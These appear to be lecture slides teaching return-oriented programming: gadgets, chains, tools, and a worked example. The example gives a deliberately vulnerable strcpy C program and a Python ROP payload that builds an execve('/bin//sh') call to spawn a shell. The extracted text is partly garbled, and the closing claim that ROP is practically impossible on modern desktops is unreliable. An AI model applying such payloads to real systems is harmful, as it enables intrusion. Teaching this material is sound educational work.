Return Oriented Programming

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Outline

- Introduction
 - Basic information
- 2 How does it work?
 - Overview
 - ROP gadgets
 - ROP chain
- 3 Example: Open a shell
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 - General approach
 - Generating the payload
- Conclusion





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What is Return Oriented Programming?

- A type attack that exploits buffer overruns
- Published by Hovav Shacham in 2007
- Arised as a technique to counter security mechanisms (NX)
- ullet Big binary o ROP is turing complete
- Many authors refer to ret-to-libc/library as ROP, according to the founder of this technique it has to be differentiated and ROP describes chaining of small code segments





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Overview

- Search the binary for gadgets: return (0xC3) bytes that contain useful instructions before
- Generate a list of these gadgets, called ROP chain
- Generate a payload with the addresses of these gadgets
- Insert payload via buffer overrun





ROP gadgets

- Gadgets are machine instructions that end on a return
- Tools: ROPgadget (https://github.com/JonathanSalwan/ROPgadget), ropper (https://github.com/sashs/Ropper), Radare2, pwntools....

Figure: ROP Gadgets

```
0x0000000000010d1 : loopne 0x1139 ; nop dword ptr [rax + rax] ; ret
0x00000000000110d : mov byte ptr [rip + 0x2f1c], 1 : pop rbp : ret
0x000000000001162 : mov eax, 0 ; pop rbp ; ret
0x000000000001151 : nop : pop rbp : ret
0x0000000000000010d3 : nop dword ptr [rax + rax] ; ret
0x0000000000112c : nop dword ptr [rax] : endbr64 : jmp 0x10a0
0x00000000000001091 : nop dword ptr [rax] : ret
0x000000000001117 : nop dword ptr cs:[rax + rax] ; ret
0x0000000000010d2 : nop word ptr [rax + rax] ; ret
0x00000000000010cf : or bh, bh ; loopne 0x1139 ; nop dword ptr [rax + rax] ; ret
0x0000000000001114 : pop rbp : ret
0x000000000001036 : push 0 ; jmp 0x1020
0x000000000000101a : ret
0x000000000001011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x000000000001171 : sub esp. 8 : add rsp. 8 : ret
0x00000000000001170 : sub rsp. 8 : add rsp. 8 : ret
```





• Especially useful are pop instructions

```
POP eax; ret;
```

- These allow us to write arbitrary values into registers
- However, sometimes we do not find a pop into our desired register (e.g. r14), here we can improvise and use something like

```
XOR r14, r14; pop r12; XOR r14, r12; ret;
```





Useful gadgets: Load/Read from memory

Move instructions are also really useful

```
mov [rax], rxc; ret;
```

allows us to write into memory

```
mov rax, [rxc]; ret;
```

- allows us to read a value from memory into a register
- Combined with pop this is very powerful





Useful gadgets: Systemcalls, arithmetics

- add, sub, div, xor, mul, div...allow us to manipulate register contents
- Since programs run in userspace we have limited privileges, if we can find systemcalls we can, in combination with the arithmetic operations and pop instructions call arbitrary system calls

```
int 0x80; ret;
```





ROP chain with parameters

Figure: ROP Chain with parameter

Gadget 1
Parameter 1
Parameter 2
Gadget 2
Gadget 3
Parameter 1
Gadget 4
Gadget 5
Gadget 6
Parameter 1





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Target Program and compilation

 We compile the following program with stack protectors turned off

```
#include <stdio.h>
2 #include <string.h>
 int main(int argc, char *argv[])
  {
4
      char buffer [8] = \{0\};
5
      if(argc != 2)
6
           printf("A single argument is required.\n");
8
           return 1:
9
      }
      strcpy(buffer, argv[1]);
      return 0;
13
14
```



Spawning a shell: Approach

- Using ropper we can find our desired gadgets
- Lets say we want to execute a shell using execve, for that we need to accomplish the following goals
 - write /bin/sh into memory (at the data segment)
 - 2 init systemcall number (11)
 - init systemcall argument (address of /bin//sh)
 - 4 call systemcall





Generating the payload, writing /bin

Generating the payload, writing //sh

```
p += pack('<I', 0x080958b5) # pop edx; xor eax, eax;
    pop edi; ret;

p += pack('<I', 0x080f0f70) # @ .data + 4

p += pack('<I', 0x00000000) # @ NULL

p += pack('<I', 0x080b526a) # pop eax; ret

p += '//sh'

p += pack('<I', 0x08059402) # mov dword ptr [edx], eax
    ; ret</pre>
```



Generating the payload, init params

```
1 # write null byte after /bin/sh
2 p += pack('<I', 0x080958b5) # pop edx; xor eax, eax;
     pop edi; ret;
_{3} p += pack('<I', 0x080f0f74) # @ .data + 8
4 p += pack('<I', 0x00000000) # @ NULL</pre>
5 p += pack('<I', 0x080506c0) # xor eax, eax ; ret
6 p += pack('<I', 0x08059402) # mov dword ptr [edx], eax
       : ret
7 # write address of /bin/sh to ebx
8 p += pack('<I', 0x08049022) \# pop ebx ; ret
9 p += pack('<I', 0x080f0f6c) # @ .data</pre>
10 # arguments and environment to ecx, edx
11 p += pack('<I', 0x0805e64f) # pop ecx; add al, 0xf6;
     ret:
p += pack('<I', 0x080f0f74) # @ .data + 8
13 p += pack('<I', 0x080958b5) # pop edx; xor eax, eax;
     pop edi; ret;
p += pack('<I', 0x080f0f74) # @ .data + 8
15 p += pack('<I', 0x00000000) # @ NULL</pre>
```



Generating the payload, init params, syscall

```
1 p += pack('<I', 0x080506c0) # xor eax, eax; ret
2 p += pack('<I', 0x08082a9e) # inc eax ; ret</pre>
g p += pack('<I', 0x08082a9e) # inc eax ; ret</pre>
4 p += pack('<I', 0x08082a9e) # inc eax ; ret</pre>
5 p += pack('<I', 0x08082a9e) # inc eax ; ret
6 p += pack('<I', 0x08082a9e) # inc eax ; ret</pre>
7 p += pack('<I', 0x08082a9e) # inc eax ; ret
8 p += pack('<I', 0x08082a9e) # inc eax ; ret
9 p += pack('<I', 0x08082a9e) # inc eax ; ret</pre>
10 p += pack('<I', 0x08082a9e) # inc eax; ret
11 p += pack('<I', 0x08082a9e) # inc eax ; ret
12 p += pack('<I', 0x08082a9e) # inc eax ; ret</pre>
13 p += pack('<I', 0x08049b2a) # int 0x80
14 print p
15
```



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Conclusion

- Return Oriented Programming is a very powerful technique
- It is able to execute any system call if there are enough rop gadgets
- There are many tools to simplify the process of finding ROP gadgets and generatating ROP payloads
- ullet Modern desktops use aslr and other protection mechanisms o practically impossible to use ROP





Sources

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https://www.proggen.org/doku.php?id=security:
memory-corruption:exploitation:rop
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Sources

